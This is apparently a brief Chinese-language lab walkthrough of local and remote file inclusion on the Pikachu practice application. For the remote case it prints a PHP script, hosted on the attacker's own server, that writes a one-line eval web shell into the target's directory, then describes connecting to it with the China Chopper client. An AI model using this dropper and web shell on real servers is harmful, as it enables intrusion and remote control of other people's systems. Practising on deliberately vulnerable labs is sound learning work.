0x01 本地文件包含
在根目录D:\phpstudy_pro\WWW\pikachu\vul\sqli下创建一个1.txt,再尝试包含一下
0x02 远程文件包含
将自己服务器上的文件下载到被害人的服务器上就是远程文件包含
1)在自己的服务器上写一个攻击脚本1.txt
<?php
$myfile = fopen("1.php", "w");
$txt = '<?php @eval($_POST["test"]);?>';
fwrite($myfile, $txt);
fclose($myfile);
?>
2)修改目标url参数包含自己服务器上的攻击脚本1.txt
访问后,一般会在当前目录下新建一个1.php一句话,访问一下
并没有回复404,直接菜刀连
成功!